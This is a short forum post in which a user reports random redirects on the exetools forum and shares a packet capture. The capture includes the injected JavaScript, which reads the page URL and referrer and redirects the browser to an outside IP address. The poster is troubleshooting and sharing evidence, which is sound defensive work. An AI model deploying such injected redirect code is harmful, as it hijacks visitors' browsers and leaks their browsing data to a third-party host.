| RedBlkJck |
04-30-2014 03:56 |
Site: Injected/Redirected?
Anyone else getting a site redirect? Started last night. I am getting random redirect upon connecting to the forum using Chrome browser and clicking for NewPost. Firefox does not seem to be doing it, probably blocking the java script.
Did a packet capture and there are no requests originating local. DNS request look good. Here is what is returned back to the browser request.
Code:
http://202.102.110.207:8080/1.htm?AIMT=http://forum.exetools.com/search.php?do=getnew&host=forum.exetools.com&refer=&server=105&pre=1398799069638
this is the code generated after clicking NewPosts
Code:
<html><head></head><script type="text/javascript">
var sa = "http://202.102.110.207:8080/"; var pp = "105&pre="+(new Date()).getTime();
var s=String(window.location.href); var host=escape(s.substring(7,s.indexOf('/',7)));
var ref=escape(document.referrer); var su = s+"&host="+host+"&refer="+ref+"&server="+pp;
s = escape(s); function loadfr(){ document.getElementById("fr1").src = sa+"3.htm?AIMT="+su; }
function refreshPage(){ document.location = sa+"2.htm?AIMT="+su; }
if (self.location == top.location){ document.location= sa+"1.htm?AIMT="+su; }
else { refreshPage(); }</script><frameset rows="*,0"><frame id="main" src="">
<frame id="fr1" src=""></frameset><body></body></html>
|
